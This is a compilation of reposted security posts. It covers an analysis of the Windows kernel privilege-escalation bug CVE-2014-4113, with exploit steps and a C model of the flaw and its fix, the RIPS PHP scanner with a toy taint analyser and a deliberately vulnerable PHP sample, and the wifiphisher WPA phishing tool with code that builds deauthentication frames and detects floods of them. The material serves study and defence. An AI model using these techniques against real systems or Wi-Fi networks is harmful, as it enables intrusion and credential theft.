Source: SSH tunnel - Noah.org
  21. Or get yourself an apple: Mac mini Desktop PC System with Intel® Core™ i7 2.30GHz processor, 4GB, 2TB, Intel® HD Graphics, OS X Server, RO - eMAG.ro
  22. An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113)
6:35 pm (UTC-7) | by Weimin Wu (Threat Analyst)

Three zero-day vulnerabilities - CVE-2014-4114, CVE-2014-4148, and CVE-2014-4113 - were reported last week and patched by Microsoft in their October 2014 Patch Tuesday. CVE-2014-4114, also known as the Sandworm vulnerability, can enable attackers to easily craft malware payloads when exploited. This particular vulnerability has been linked to targeted attacks against European sectors and industries. In addition, our researchers found that Sandworm was also being used to target SCADA systems.

The latter two vulnerabilities (CVE-2014-4148, CVE-2014-4113) leveraged vulnerabilities in the Windows kernel (Win32k.sys), affecting most Windows versions. In 2013, only one Windows kernel zero-day was made public; this particular vulnerability only affected some versions of Windows XP and Windows 2003. These new zero-days could be a sign that attackers are possibly shifting their focus back to kernel vulnerabilities.

CVE-2014-4113 allows for the elevation of privileges when exploited successfully. Microsoft addressed this in MS14-058. The vulnerability affects both desktop and server versions from Windows XP and Server 2003 up to Windows 8.1 and Server 2012 R2. However, the currently available exploit code does not affect Windows 8 and later versions. With a parameter in the command line, the exploit code can create new processes with System privileges of an assigned program.

EoP exploits are also believed to be used in targeted attacks, since the exploitable application does not have the privileges needed by attackers. This was seen in Stuxnet, which employed CVE-2010-2743 (also in Win32k.sys) for EoP after using another exploit to infect the system.

The analysis of this vulnerability and its exploit will be based on samples with the following MD5 hashes:

[CODE]
70857e02d60c66e27a173f8f292774f1
f9f01ce747679b82723b989d01c4d927
[/CODE]

We detect these as TROJ_APOLMY.A and TROJ64_APOLMY.A, with the latter being the version found on 64-bit systems.

[h=2]Everything you need to know about the Win32k.sys vulnerability[/h]

Win32k.sys is responsible for window management, and any GUI process/thread will use it. Its related user-mode modules are user32.dll and GDI32.dll. Due to the complex interaction with user-mode applications, there are many problems in Win32k.sys. Let's take a closer look at the vulnerability being exploited.

The essential problem is that the function return value is not validated correctly. Programmers tend to overlook this, but doing otherwise is a serious security risk. In Win32k.sys, there is a function called xxxMNFindWindowFromPoint(), which returns the address of a win32k!tagWND structure or the error code -1 or -5. Another function, xxxHandleMenuMessages(), will call it and use its return value as a parameter of xxxSendMessage(). Below is the pseudo code:

[CODE]
xxxHandleMenuMessages()
{
    tagWnd* pWnd = xxxMNFindWindowFromPoint(…);
    …
    //without checking if the return value is a valid address
    xxxSendMessage(pwnd,…);
}
[/CODE]

Obviously, if the error code -1 or -5 is used in xxxSendMessage() as an address, it will result in an error, such as a blue screen. In user-mode code, this is currently not exploitable. We will see how the sample exploits this vulnerability in kernel-mode in the next section.

Below are the key steps or description on how the exploit occurs:
[LIST=1]
[*]Map a prepared memory section to the NULL page, which includes a fake win32k!tagWND structure and a pointer to shell code for EoP in that structure.
[*]Trigger the bug and make the return value (pWnd) of xxxMNFindWindowFromPoint() -5 (0xfffffffb). Because all to-be-checked fields in the fake structure are accessible and in proper values, xxxSendMessage() will treat -5 as a valid address.
[*]It will then call a function pointer in the structure, which is the pointer to the shell code.
[*]Replace the token in EPROCESS to elevate to SYSTEM privileges in shell code.
[*]Create a child process with SYSTEM privileges of the assigned program.
[/LIST]

The sample uses SetWindowsHookEx() to control xxxMNFindWindowFromPoint() to return -5:
[LIST=1]
[*]Create a window and a 2-level popup menu.
[*]Hook that window's wndproc call.
[*]Track the popup menu on the window and enter the hook callback.
[*]In the hook callback, it changes the wndproc of the menu to another callback.
[*]In the menu's callback, it will destroy the menu and return -5 (PUSH 0xfffffffb; POP EAX).
[*]This leads xxxMNFindWindowFromPoint() on the destroyed menu to return -5.
[/LIST]

Furthermore, the shell code of the sample is simple and direct, as can be seen from the snippet below. We can see that it gets the EPROCESS of the SYSTEM process (PID=4), and copies its privilege token to the EPROCESS of the current process.

Figure 1. Code snippet of the sample

From the analysis, we can see that it is easier to exploit these kernel vulnerabilities than to exploit vulnerabilities like Internet Explorer UAF vulnerabilities. Some effective protections in user-mode, like DEP, are easily bypassed in kernel-mode exploits. This is because a program, instead of entered data or script, is used to exploit the bug. Such code is by its nature already executable.

With more application sandboxing adopted in the OS, kernel vulnerabilities will be more important for privilege elevation. Though this exploitation method is not new anymore, it will be noticed by attackers, especially now that CVE-2014-4113 is public. During our sample sourcing, we even saw that the source code of an exploit creation tool was exposed. It is expected that more exploit variants will be created by attackers. We believe that threat actors and attackers need kernel vulnerabilities to carry out EoP attacks and break application sandboxing. Once information about these exploitation methods becomes more prevalent, we may see more similar kernel zero-day vulnerabilities in the future.

Windows 7 and Windows XP are the versions of Windows most at risk of this attack. Enterprises are heavy users of both versions, and may be affected by this threat. We highly recommend that users and system administrators apply the relevant patches and keep their systems up-to-date.

Windows 8 and later versions are at less risk, as the currently available exploit code is blocked on these versions. This is because of a new security feature known as Supervisor Mode Execution Prevention (SMEP), which prevents the access (read/write/execute) of user-mode memory pages in kernel-mode. As such, the access to the null page and shell code will not lead to code execution, although it will lead to crashes.

Trend Micro is continuously monitoring the threat landscape for any developments regarding these vulnerabilities including Sandworm. For more information on them, you may read our other articles:
[LIST]
[*]Sandworm to Blacken: The SCADA Connection
[*]An Analysis of Windows Zero-day Vulnerability 'CVE-2014-4114' aka "Sandworm"
[*]MS Zero-Day Used in Attacks Against European Sectors, Industries
[/LIST]

Source: An Analysis of A Windows Kernel-Mode Vulnerability (CVE-2014-4113) | Security Intelligence Blog | Trend Micro
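The unchecked-return-value pattern the article describes, modelled in C as an added example (this is not code from the article, from the sample it analyses, or from Win32k.sys). A finder returns either a window pointer or the error codes -1/-5 encoded as a pointer; the vulnerable caller hands that value straight to the dispatcher, the fixed caller rejects the error encodings before they are ever used as an address. The wnd_t fields, the tiny lookup table that stands in for "is this address mapped", and run_scenario() are assumptions made for the model: no NULL page is mapped and nothing runs in kernel mode, the table simply lets a scenario pretend that the address 0xfffffffb is backed by an attacker-supplied structure, which is what the NULL-page mapping achieves on 32-bit Windows.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Outcomes reported by the model. */
enum { RESULT_OK = 0, RESULT_BUGCHECK = 1, RESULT_ERROR_REJECTED = 2, RESULT_HIJACKED = 3 };

/* Minimal model of win32k!tagWND: one field the dispatcher checks and the
 * function pointer it ends up calling (hypothetical layout). */
typedef struct wnd {
    int valid;
    int (*wndproc)(struct wnd *self);
} wnd_t;

/* Error codes the finder encodes in its pointer return: -1 and -5, the
 * values the article gives for xxxMNFindWindowFromPoint(). */
#define WND_ERR_NONE      ((wnd_t *)(intptr_t)-1)
#define WND_ERR_DESTROYED ((wnd_t *)(intptr_t)-5)

/* Any value in the last page of the address space is an error encoding,
 * not a window. This is exactly the check the vulnerable caller omits. */
static int wnd_is_err(const wnd_t *p)
{
    return (uintptr_t)p >= (uintptr_t)-4095;
}

/* Toy address space: a lookup table decides whether an address is backed.
 * Error-code addresses are unmapped unless a scenario registers a backing
 * object for them (the model's stand-in for the exploit's NULL-page mapping). */
static struct { uintptr_t addr; wnd_t *backing; } g_map[4];
static size_t g_nmap;

static void map_reset(void) { g_nmap = 0; }

static void map_add(uintptr_t addr, wnd_t *backing)
{
    if (g_nmap < sizeof g_map / sizeof g_map[0]) {
        g_map[g_nmap].addr = addr;
        g_map[g_nmap].backing = backing;
        g_nmap++;
    }
}

static wnd_t *deref(wnd_t *p)
{
    for (size_t i = 0; i < g_nmap; i++)
        if (g_map[i].addr == (uintptr_t)p)
            return g_map[i].backing;
    return wnd_is_err(p) ? NULL : p;
}

/* Window procedures used by the scenarios; the attacker one stands in for
 * the token-stealing shell code, it only reports that it was reached. */
static int legit_wndproc(wnd_t *self)    { (void)self; return RESULT_OK; }
static int attacker_wndproc(wnd_t *self) { (void)self; return RESULT_HIJACKED; }

/* Stand-in for xxxMNFindWindowFromPoint(): a window, or an error code as a pointer. */
static wnd_t *find_window_from_point(wnd_t *menu_wnd, int menu_destroyed)
{
    if (menu_wnd == NULL) return WND_ERR_NONE;
    if (menu_destroyed)   return WND_ERR_DESTROYED;
    return menu_wnd;
}

/* Stand-in for xxxSendMessage(): checks a field, then calls the window procedure. */
static int send_message(wnd_t *pwnd)
{
    wnd_t *obj = deref(pwnd);
    if (obj == NULL) return RESULT_BUGCHECK;  /* unmapped address: the kernel would crash */
    if (!obj->valid) return RESULT_OK;        /* the field check a fake structure is built to pass */
    return obj->wndproc(obj);
}

/* VULNERABLE: the article's pseudo code, no check on the return value. */
int handle_menu_messages_vulnerable(wnd_t *menu_wnd, int menu_destroyed)
{
    wnd_t *pwnd = find_window_from_point(menu_wnd, menu_destroyed);
    return send_message(pwnd);
}

/* FIXED: reject the error encodings before the value is used as an address. */
int handle_menu_messages_fixed(wnd_t *menu_wnd, int menu_destroyed)
{
    wnd_t *pwnd = find_window_from_point(menu_wnd, menu_destroyed);
    if (wnd_is_err(pwnd))
        return RESULT_ERROR_REJECTED;
    return send_message(pwnd);
}

/* One scenario: menu destroyed or not, attacker-controlled object registered at
 * the error address or not, vulnerable or fixed caller. Returns the outcome. */
int run_scenario(int menu_destroyed, int attacker_mapped, int use_fixed)
{
    static wnd_t real = { 1, legit_wndproc };
    static wnd_t fake = { 1, attacker_wndproc };  /* constructed fake tagWND */
    map_reset();
    if (attacker_mapped)
        map_add((uintptr_t)WND_ERR_DESTROYED, &fake);
    return use_fixed ? handle_menu_messages_fixed(&real, menu_destroyed)
                     : handle_menu_messages_vulnerable(&real, menu_destroyed);
}

int main(void)
{
    printf("vulnerable, menu destroyed, -5 unmapped : %d (1 = bugcheck)\n", run_scenario(1, 0, 0));
    printf("vulnerable, menu destroyed, -5 mapped   : %d (3 = hijacked)\n", run_scenario(1, 1, 0));
    printf("fixed,      menu destroyed, -5 mapped   : %d (2 = rejected)\n", run_scenario(1, 1, 1));
    return 0;
}
```

The three printed scenarios are the article's story in order: without a backing page the bad pointer only crashes (the blue screen), with one it transfers control to whatever the structure points at, and the one-line check in the fixed caller closes both paths regardless of what is mapped.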
23. 18 October 2014
RIPS – Static Source Code Analysis For PHP Vulnerabilities
RIPS is a tool written in PHP to find vulnerabilities in PHP web applications using static source code analysis. By tokenizing and parsing all source code files, RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities, RIPS also offers an integrated code audit framework for further manual analysis.
Features
– detect XSS, SQLi, file disclosure, LFI/RFI, RCE vulnerabilities and more
– 5 verbosity levels for debugging your scan results
– mark vulnerable lines in the source code viewer
– highlight variables in the code viewer
– user-defined function code by mouse-over on a detected call
– active jumping between function declaration and calls
– list of all user-defined functions (defines and calls), program entry points (user input) and scanned files (with includes), connected to the source code viewer
– graph visualization for files and includes as well as functions and calls
– create CURL exploits for detected vulnerabilities with a few clicks
– visualization, description, example, PoC, patch and securing function list for every vulnerability
– 7 different syntax highlighting colour schemata
– display scan results in the form of a top-down flow or bottom-up trace
– the only minimal requirement is a local webserver with PHP and a browser (tested with Firefox)
– regex search function
There are other PHP-centric tools we’ve covered such as:
– RATS – Rough Auditing Tool for Security
– Skavenger – Source Code Auditing Tool!
– SpikeSource Spike PHP Security Audit Tool
If you are interested in more tools of this type you can find our complete list here (which covers various languages) – Code Auditing Tools.
NOTE: The authors have stated that RIPS 0.5 development is abandoned. A complete rewrite is in the works and is used as an academic prototype, but it is not publicly available yet. So we’ll be keeping an eye on what happens with that. But for now you can download RIPS here: rips-0.54.zip Or read more here.
Source: RIPS - Static Source Code Analysis For PHP Vulnerabilities - Darknet - The Darkside
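To make concrete what "sensitive sinks tainted by user input" and "bottom-up trace" mean in the post above, here is a toy static taint pass over PHP. This is an added example written for this page, not RIPS code: the PHP snippet is constructed and deliberately vulnerable, and the source, sink and sanitizer tables, the statement splitter and the trace format are all assumptions of the demo. It marks variables assigned from superglobals as tainted, propagates taint through assignment and concatenation in statement order, and reports any sink call whose argument is tainted, together with the chain of statements that carried the taint there. Real RIPS works on the full PHP token stream, handles functions and includes, and maps sanitizers to the sink classes they actually protect; this toy treats a right-hand side that is exactly one sanitizer call as clean for every sink.

```python
"""Toy static taint analysis for PHP, in the spirit of RIPS (constructed example, not RIPS code)."""
import re

# Taint sources: superglobals an attacker controls.
SOURCES = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")
# Sensitive sinks and the vulnerability class a tainted argument would produce.
SINKS = {
    "eval": "RCE", "system": "RCE", "exec": "RCE", "passthru": "RCE", "shell_exec": "RCE",
    "include": "LFI/RFI", "include_once": "LFI/RFI", "require": "LFI/RFI", "require_once": "LFI/RFI",
    "mysql_query": "SQLi", "mysqli_query": "SQLi",
    "readfile": "File disclosure", "file_get_contents": "File disclosure",
    "echo": "XSS", "print": "XSS",
}
# Assumption of this demo: a right-hand side that is exactly one of these calls is clean for
# every sink. Real analyzers map each sanitizer to the sink classes it actually neutralizes.
SANITIZERS = ("intval", "escapeshellarg", "htmlspecialchars", "mysql_real_escape_string", "basename")

VAR_RE = re.compile(r"\$[A-Za-z_]\w*")
ASSIGN_RE = re.compile(r"^(\$[A-Za-z_]\w*)(?:\[[^\]]*\])?\s*(\.?=)(?!=)\s*(.*)$", re.S)
SINK_RE = re.compile(r"^@?(" + "|".join(map(re.escape, SINKS)) + r")\b\s*(.*)$", re.S)
SANITIZED_RE = re.compile(r"^(?:" + "|".join(SANITIZERS) + r")\s*\(.*\)$", re.S)
COMMENT_RE = re.compile(r"/\*.*?\*/|//[^\n]*", re.S)  # naive: would also hit '//' inside strings


def statements(src):
    """Yield (line_number, statement) with comments and PHP tags removed, split on ';'."""
    src = COMMENT_RE.sub(lambda m: "\n" * m.group(0).count("\n"), src)  # keep line numbering intact
    src = src.replace("<?php", "     ").replace("?>", "  ")
    for m in re.finditer(r"[^;]+;", src):
        body = m.group(0)[:-1]
        stmt = body.strip()
        if stmt:
            first = m.start() + len(body) - len(body.lstrip())  # offset of the first real character
            yield src.count("\n", 0, first) + 1, stmt


def expr_taint(expr, tainted):
    """Return the trace explaining why `expr` is attacker-controlled, or None if it looks clean."""
    if SANITIZED_RE.match(expr):
        return None
    for source in SOURCES:
        if source in expr:
            return [f"source {source}"]
    for var in VAR_RE.findall(expr):
        if var in tainted:
            return tainted[var]
    return None


def analyze(src):
    """Sequential, intraprocedural pass: propagate taint through assignments, report tainted sinks."""
    tainted = {}   # variable -> bottom-up trace (list of "line N: statement")
    findings = []
    for line, stmt in statements(src):
        m = ASSIGN_RE.match(stmt)
        if m:
            var, op, rhs = m.groups()
            trace = expr_taint(rhs, tainted)
            if trace is not None:
                tainted[var] = trace + [f"line {line}: {stmt}"]
            elif op == "=":
                tainted.pop(var, None)  # a clean plain assignment kills earlier taint
            continue  # limitation: a sink call on the right-hand side is not inspected
        m = SINK_RE.match(stmt)
        if m:
            sink, arg = m.groups()
            trace = expr_taint(arg, tainted)
            if trace is not None:
                findings.append({"line": line, "sink": sink, "type": SINKS[sink],
                                 "trace": trace + [f"line {line}: {stmt}"]})
    return findings


# Constructed vulnerable snippet used as input for the demo.
SAMPLE_PHP = """<?php
// constructed sample, deliberately vulnerable
$id = $_GET['id'];
$safe = intval($_GET['id']);
$name = $_POST['name'];
$cmd = "ls " . $name;
system($cmd);
mysql_query("SELECT * FROM users WHERE id = " . $safe);
echo htmlspecialchars($name);
echo $id;
include($_GET['page'] . ".php");
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_PHP):
        print(f"{f['type']} via {f['sink']} at line {f['line']}")
        for step in reversed(f["trace"]):   # bottom-up trace: sink first, source last
            print("    <-", step)
```

Running it reports the `system($cmd)` call (RCE, reached through `$cmd` and `$name` from `$_POST`), the bare `echo $id` (XSS) and the `include` built from `$_GET['page']` (LFI/RFI), while the `intval`-guarded query and the `htmlspecialchars`-wrapped echo are left alone. The same false-negative classes that bite real tools show up even here: a sink call hidden on the right-hand side of an assignment, a sanitizer that is wrong for the sink (`htmlspecialchars` before `system`), or taint flowing through a function call are all invisible to this pass.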
24. [h=2]About[/h]
Wifiphisher is a security tool that mounts fast automated phishing attacks against WPA networks in order to obtain the secret passphrase. It is a social engineering attack that, unlike other methods, does not include any brute forcing. It is an easy way of obtaining WPA credentials. Wifiphisher works on Kali Linux and is licensed under the MIT license.
From the victim's perspective, the attack proceeds in three phases:
Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by sending deauth packets to the client from the access point, to the access point from the client, and to the broadcast address as well.
Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will start connecting to the rogue access point. After this phase, the victim is MiTMed.
Victim is being served a realistic router config-looking page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for WPA password confirmation due to a router firmware upgrade.
Performing MiTM attack
[h=2]Usage[/h]
[h=2]Screenshots[/h]
Targeting an access point
A successful attack
[h=2]Requirements[/h]
Kali Linux.
Two network interfaces, one wireless.
A wireless card capable of injection.
[h=2]Credits[/h]
The idea belongs to Dan McInerney, who also authored two essential modules of this script, wifijammer and fakeAP.
[h=2]License[/h]
Wifiphisher is licensed under the MIT license. See LICENSE for more information.
Source: https://github.com/sophron/wifiphisher
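The first phase above rests on one protocol fact: 802.11 deauthentication is an unauthenticated management frame, so anyone who can spoof the source address can kick a station off its access point. The following is an added example, not wifiphisher or wifijammer code. It builds the three frames the description lists per jamming round (AP to client, client to AP, AP to broadcast) as raw bytes, parses them back, and then runs the check a defender would apply to a capture: count deauth frames per BSSID in a window and flag a flood, noting broadcast deauths separately since a legitimate AP almost never sends those. The MAC addresses, the reason code 7 and the flood threshold are assumptions made for the demo, and nothing here transmits.

```python
"""802.11 deauthentication frames as raw bytes: the jammer's three frames per round and a
defender-side flood check. Constructed example; nothing here touches a radio."""
import struct
from collections import Counter

# Frame Control as a little-endian u16: byte 0 = version 0 | type 0 (management) | subtype 12
# (deauthentication) = 0xC0; byte 1 = flags = 0x00.
DEAUTH_FC = 0x00C0
TYPE_SUBTYPE_MASK = 0x00FC          # ignore the protocol version bits and the flags byte
BROADCAST = "ff:ff:ff:ff:ff:ff"
REASON_CLASS3_NONASSOC = 7          # "class 3 frame received from nonassociated STA"; assumed here


def mac_bytes(mac):
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_deauth(dst, src, bssid, reason=REASON_CLASS3_NONASSOC, seq=0):
    """Deauth frame without FCS: FC, duration, addr1 (DA), addr2 (SA), addr3 (BSSID), seq ctrl, reason."""
    frame = struct.pack("<HH", DEAUTH_FC, 0)
    frame += mac_bytes(dst) + mac_bytes(src) + mac_bytes(bssid)
    frame += struct.pack("<H", (seq & 0x0FFF) << 4)   # sequence number in the upper 12 bits, fragment 0
    frame += struct.pack("<H", reason)
    return frame


def parse_deauth(frame):
    """Return addresses, sequence number and reason code, or None for any other frame type."""
    if len(frame) < 26:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if (fc & TYPE_SUBTYPE_MASK) != DEAUTH_FC:
        return None
    dst, src, bssid = (mac_str(frame[off:off + 6]) for off in (4, 10, 16))
    seq = struct.unpack_from("<H", frame, 22)[0] >> 4
    reason = struct.unpack_from("<H", frame, 24)[0]
    return {"dst": dst, "src": src, "bssid": bssid, "seq": seq, "reason": reason}


def jammer_round(ap_mac, client_mac, seq=0):
    """The three frames the description lists per round: AP->client, client->AP, AP->broadcast."""
    return [
        build_deauth(client_mac, ap_mac, ap_mac, seq=seq),   # spoofed as coming from the AP
        build_deauth(ap_mac, client_mac, ap_mac, seq=seq),   # spoofed as coming from the client
        build_deauth(BROADCAST, ap_mac, ap_mac, seq=seq),    # kicks every associated station
    ]


def deauth_flood(capture, threshold=10):
    """Defender side: deauths per BSSID in one capture window; returns BSSIDs at or above threshold.
    Broadcast-addressed deauths are counted separately because legitimate APs rarely emit them."""
    per_bssid, broadcast = Counter(), Counter()
    for frame in capture:
        d = parse_deauth(frame)
        if d is None:
            continue
        per_bssid[d["bssid"]] += 1
        if d["dst"] == BROADCAST:
            broadcast[d["bssid"]] += 1
    return {b: {"deauths": n, "broadcast": broadcast[b]} for b, n in per_bssid.items() if n >= threshold}


# Constructed capture: four jamming rounds against one AP plus one unrelated beacon (subtype 8).
AP, CLIENT = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:01"
BEACON_LIKE = struct.pack("<HH", 0x0080, 0) + bytes(22)
SAMPLE_CAPTURE = [f for i in range(4) for f in jammer_round(AP, CLIENT, seq=i)] + [BEACON_LIKE]

if __name__ == "__main__":
    for frame in jammer_round(AP, CLIENT):
        print(frame.hex(), parse_deauth(frame))
    print(deauth_flood(SAMPLE_CAPTURE))
```

The flood check is the cheap, generic counterpart to wireless IDS rules: a dozen deauths from one BSSID in a short window, several of them to the broadcast address, is not what a healthy network looks like. The structural fix is 802.11w (Protected Management Frames), which authenticates deauthentication and disassociation frames so a spoofed one is dropped by the client; when both the AP and the client support it, the first phase of the attack as described above does not work.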